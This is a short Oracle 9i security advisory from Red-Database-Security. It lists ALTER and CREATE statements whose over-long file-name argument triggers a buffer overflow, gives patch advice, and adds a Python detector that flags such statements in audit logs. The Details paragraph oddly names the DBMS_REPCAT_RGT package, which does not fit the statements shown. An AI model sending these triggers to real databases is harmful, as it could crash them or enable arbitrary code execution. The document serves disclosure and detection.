Red-Database-Security GmbH is specialized in Oracle Security
Buffer Overflow in File Parameter in Oracle 9i
Details
Buffer Overflow in DBMS_REPCAT_RGT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code.

Example
ALTER DATABASE RENAME FILE 'longstring' TO 'anything';
ALTER DATABASE BACKUP CONTROLFILE TO 'longstring';
ALTER DATABASE CREATE STANDBY CONTROLFILE AS 'longstring';
ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstring';
CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstring';
ALTER DATABASE TEMPFILE 'longstring' online;
ALTER DATABASE CLEAR LOGFILE 'longstring';
ALTER DATABASE RECOVER LOGFILE 'longstring';
ALTER DATABASE DROP LOGFILE MEMBER 'longstring';
ALTER DATABASE datafile 'longstring' ONLINE;
ALTER INDEX indexname allocate extent(datafile 'longstring');
CREATE TABLESPACE tablespacename DATAFILE 'longstring';
ALTER CLUSTER clustername allocate extent(datafile 'longstring');

Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2004 or at least alert 68).

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
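A detection check for the statements listed under Example, as an added example that is not part of the original advisory: it scans captured SQL text for ALTER/CREATE statements that carry one of the listed file clauses and flags any string literal above a length limit. The limit `MAX_LITERAL_LEN`, the function names, the `(db_user, sql_text)` record shape and the sample records are assumptions made for illustration; the advisory does not state a length.

```python
import re

# Assumption: the advisory gives no length, so this limit is a site policy value.
MAX_LITERAL_LEN = 512

# ALTER/CREATE statements carrying one of the file clauses the advisory lists.
DDL_WITH_FILE = re.compile(
    r"^\s*(ALTER|CREATE)\b.*\b(RENAME\s+FILE|CONTROLFILE|TEMPFILE|LOGFILE|DATAFILE)\b",
    re.IGNORECASE | re.DOTALL,
)
# Oracle string literal; '' is an escaped quote inside the literal.
LITERAL = re.compile(r"'((?:[^']|'')*)'")


def oversized_literals(sql, limit=MAX_LITERAL_LEN):
    """Return lengths of string literals over `limit` in a file-related DDL."""
    if not DDL_WITH_FILE.search(sql):
        return []
    lengths = (len(m.group(1)) for m in LITERAL.finditer(sql))
    return [n for n in lengths if n > limit]


def scan(records, limit=MAX_LITERAL_LEN):
    """records: iterable of (db_user, sql_text). Returns (user, prefix, length)."""
    findings = []
    for user, sql in records:
        sizes = oversized_literals(sql, limit)
        if sizes:
            # Report only the text before the first literal, not the payload.
            findings.append((user, sql.split("'")[0].strip(), max(sizes)))
    return findings


# Constructed sample audit records (users, paths and lengths are made up).
SAMPLE_AUDIT = [
    ("SYS", "ALTER DATABASE RENAME FILE '/u01/a.dbf' TO '/u02/a.dbf';"),
    ("SCOTT", "ALTER DATABASE BACKUP CONTROLFILE TO '" + "x" * 1000 + "';"),
    ("APP", "SELECT 'DATAFILE' || '" + "x" * 1000 + "' FROM dual;"),
    ("OPS", "alter index i1 allocate extent(datafile '" + "x" * 600 + "');"),
]

if __name__ == "__main__":
    for user, prefix, length in scan(SAMPLE_AUDIT):
        print(f"{user}: {prefix} ... literal of {length} characters")
```

The check is useful on systems that cannot be patched immediately; it complements the patch named under Patch Information and does not replace it.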